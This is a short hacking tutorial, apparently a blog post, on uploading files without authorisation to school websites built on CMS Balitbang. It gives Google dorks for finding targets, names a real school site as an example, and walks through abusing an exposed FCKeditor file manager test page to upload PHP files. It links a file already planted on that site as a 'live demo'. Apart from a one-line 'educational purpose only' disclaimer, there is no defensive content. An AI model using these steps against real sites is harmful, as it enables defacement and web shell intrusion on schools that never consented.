CMS Balitbang Upload Vulnerabilities

This post is just for educational purpose only.

Finding Vulnerable Sites

Dorks:

inurl:"/html/siswa.php?"
inurl:"/html/alumni.php?"
inurl:"/html/guru.php?"

Exploit:

editor/filemanager/connectors/test.html

1- Copy and paste any of these dorks on Google to find vulnerable website that contain bug at CMS Balitbang.

2- After that, choose any site as your target.

3- Example :

http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem+Point


Exploiting Target

1- Paste the exploit behind the site URL

From:

http://www.sman1kotabaru.sch.id/html/siswa.php?id=profil&kode=47&profil=Sistem+Point

To:

http://www.sman1kotabaru.sch.id/editor/filemanager/connectors/test.html

2- You will see an UPLOAD option.

3- Change ASP to PHP

4- When your file is successfully uploaded, something like this will appear

URL: php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2F

5- To view your file, add /userfiles/file/yourfile.txt at the end of the URL 

Live Demo

http://www.sman1kotabaru.sch.id/userfiles/file/wew.txt

Good Luck :)

By Black Eagle